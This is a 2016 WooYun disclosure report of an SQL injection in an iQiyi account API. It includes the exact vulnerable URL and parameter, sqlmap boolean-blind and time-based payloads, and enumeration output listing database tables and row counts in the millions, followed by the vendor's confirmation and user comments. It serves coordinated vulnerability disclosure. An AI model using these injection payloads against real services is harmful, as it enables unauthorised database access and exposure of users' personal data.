当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0190648

漏洞标题:爱奇艺某站SQL注入(一千五百万数据)

相关厂商:奇艺

漏洞作者: Blcat

提交时间:2016-03-30 10:57

修复时间:2016-05-14 11:40

公开时间:2016-05-14 11:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-30: 细节已通知厂商并且等待厂商处理中
2016-03-30: 厂商已经确认,细节仅向厂商公开
2016-04-09: 细节向核心白帽子及相关领域专家公开
2016-04-19: 细节向普通白帽子公开
2016-04-29: 细节向实习白帽子公开
2016-05-14: 细节向公众公开

简要描述:

我只是想缓存个电影出去玩的时候看
结果吓死本宝宝了

详细说明:

http://account.iqiyi.com/services/account/info.action?version=1.0.0&uid=1266760165&platform=iphone-iqiyi&access_code=huiyuan&platform_code=bb35a104d95490f6&mix=1&testMode=0


platform_code可以注入

---
Parameter: platform_code (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: version=1.0.0&uid=1266760165&platform=iphone-iqiyi&access_code=huiyuan&platform_code=bb35a104d95490f6') AND 2143=2143 AND ('LHks'='LHks&mix=1&testMode=0
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: version=1.0.0&uid=1266760165&platform=iphone-iqiyi&access_code=huiyuan&platform_code=bb35a104d95490f6') AND SLEEP(5) AND ('xGQD'='xGQD&mix=1&testMode=0
---

漏洞证明:

先跑个user

database management system users [1]:
[*] 'qiyiaccount'@'10.11.%'


再来个database

Database: qiyi_account
[54 tables]
+---------------------------------+
| acc_auth_authority_resource     |
| account_abnormal                |
| account_account                 |
| account_account_ext             |
| account_account_sub             |
| account_account_sub_debug       |
| account_appstore_recharge_count |
| account_async_task              |
| account_async_task_processed    |
| account_audit                   |
| account_auth_authority          |
| account_auth_resource           |
| account_auth_role               |
| account_auth_role_authority     |
| account_auth_user               |
| account_auth_user_authority     |
| account_auth_user_role          |
| account_auto_renew              |
| account_bi_uid                  |
| account_cash_coupon             |
| account_cash_coupon_send        |
| account_dict                    |
| account_dut_bind_log            |
| account_dut_pay_type            |
| account_dut_renew_log           |
| account_dut_type                |
| account_dut_user                |
| account_exception_order         |
| account_lock                    |
| account_log_operator            |
| account_notify_log              |
| account_order                   |
| account_recharge_access         |
| account_recharge_access_channel |
| account_recharge_access_qd      |
| account_recharge_channel        |
| account_recharge_coins          |
| account_recharge_platform       |
| account_recharge_qd             |
| account_recharge_rule           |
| account_refund_order            |
| account_security                |
| account_security_level          |
| account_security_message        |
| account_settlement              |
| account_split_coupon_user       |
| account_sub_platform            |
| account_sub_types               |
| account_test_user               |
| account_third_order             |
| account_tracker_code            |
| account_uid_change              |
| account_wechat_info             |
| boss_test_user                  |
+---------------------------------+


随便翻了几个表

Database: qiyi_account
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| account_security | 624597  |
+------------------+---------+
Database: qiyi_account
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| account_dut_user | 15509726 |
+------------------+---------+

修复方案:

估计是拼接sql语句了吧
改代码吧

版权声明:转载请注明来源 Blcat@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-03-30 11:36

厂商回复:

感谢白帽子的报告,经业务方确认,报告中提到的用户数据已做脱敏处理(泄漏了用户名、邮箱、手机号中间4位加*),此处不涉及到用户密码。 感谢关注爱奇艺PPS安全,我们已着手修复。

最新状态:

2016-03-30:谢谢 @Blcat 的报告,这份报告中提及的1500万数据是第三方同步给爱奇艺的(我们同样有责任和义务保护好这部分数据),库中爱奇艺自身账户体系中的数据是80万。 感谢关注爱奇艺安全 :)

漏洞评价:

评价

  1. 2016-03-30 10:58 | 马崧耀 ( 实习白帽子 | Rank:59 漏洞数:13 )

    沙发

  2. 2016-03-30 10:58 | 木易 ( 普通白帽子 | Rank:321 漏洞数:65 | 不,,不要误会,我不是针对谁,我是说在座...)

    前排开始

  3. 2016-03-30 10:58 | 土夫子 ( 普通白帽子 | Rank:469 漏洞数:83 | 看似山穷水尽,终将柳暗花明)

    不应该啊

  4. 2016-03-30 10:59 | 小博博 ( 实习白帽子 | Rank:80 漏洞数:14 | 工作)

    前排

  5. 2016-03-30 10:59 | water ( 普通白帽子 | Rank:499 漏洞数:155 | If you have one, then we have more than ...)

    缓存~~~我觉得这是手机app相关接口的洞

  6. 2016-03-30 10:59 | Hckmaple ( 普通白帽子 | Rank:210 漏洞数:53 | ~~~)

    围观

  7. 2016-03-30 11:00 | 狗狗侠 认证白帽子 ( 普通白帽子 | Rank:518 漏洞数:58 | 我是狗狗侠)

    牛逼。。。。

  8. 2016-03-30 11:00 | 我爱,你老婆 ( 实习白帽子 | Rank:45 漏洞数:15 | 猥琐的猥琐!)

    前排 CCAV看这里

  9. 2016-03-30 11:01 | phoenixne ( 普通白帽子 | Rank:288 漏洞数:103 | 小本毕业,向各位学习)

    觉得 是 缓存的时候爆出了错误信息

  10. 2016-03-30 11:03 | just_joker ( 普通白帽子 | Rank:124 漏洞数:22 | ..........)

    看片引发的血案。。。

  11. 2016-03-30 11:04 | 啊L川 认证白帽子 ( 普通白帽子 | Rank:195 漏洞数:39 | 菜鸟 ,菜渣, 菜呀!)

    好low的标题

  12. 2016-03-30 11:05 | sauce ( 普通白帽子 | Rank:214 漏洞数:35 | test)

    你这运气太好

  13. 2016-03-30 11:15 | linkey ( 实习白帽子 | Rank:83 漏洞数:37 | sqlmap的超爱好者)

    坐等公布

  14. 2016-03-30 11:19 | Mark0smith ( 普通白帽子 | Rank:148 漏洞数:65 | 我要是再正常一点就好了)

    66666

  15. 2016-03-30 11:21 | 咚咚呛 ( 普通白帽子 | Rank:263 漏洞数:34 | 我是一只小毛驴咿呀咿呀呦~~)

    这个6

  16. 2016-03-30 11:21 | 沦沦 ( 普通白帽子 | Rank:647 漏洞数:147 | 爱老婆,爱生活|脚步不能停要一直向前走【...)

    @lijiejie

  17. 2016-03-30 11:22 | hecate ( 普通白帽子 | Rank:810 漏洞数:127 | ®高级安全工程师 | WooYun认证√)

    @荒废的腰子 互撸娃

  18. 2016-03-30 11:31 | von ( 路人 | Rank:18 漏洞数:8 | 一个帅字贯穿了我的一生~)

    666

  19. 2016-03-30 12:28 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  20. 2016-03-30 13:20 | 随风的风 ( 普通白帽子 | Rank:244 漏洞数:91 | 微信公众号:233sec 不定期分享各种漏洞思...)

    关注

  21. 2016-03-30 13:37 | 小白-x9 ( 路人 | Rank:8 漏洞数:3 | qq1750996184 14岁学生而已)

    围观

  22. 2016-03-30 14:28 | 龚稳 ( 实习白帽子 | Rank:50 漏洞数:18 | 没有做不到的,只有不想做的)

    给我来几个月会员

  23. 2016-03-30 14:29 | 龚稳 ( 实习白帽子 | Rank:50 漏洞数:18 | 没有做不到的,只有不想做的)

    居然还脱裤了

  24. 2016-03-30 16:26 | 键盘手 ( 路人 | Rank:12 漏洞数:4 | *V*)

    "这份报告中提及的1500万数据是第三方同步给爱奇艺的"第三方给你这些数据的时候有没有经过我们客户的同意?非法采集非法交易,是不是涉及法律问题???

  25. 2016-03-30 16:36 | 迪南 ( 普通白帽子 | Rank:532 漏洞数:107 | 我真是一个大菜比)

    问的好

  26. 2016-03-30 17:27 | Jn· ( 路人 | Rank:30 漏洞数:14 | 本小菜很可爱,如果不服你TM来打我啊--哎呀...)

    这洞你留多少天啦...我爱奇艺前段时间都发现异地登录...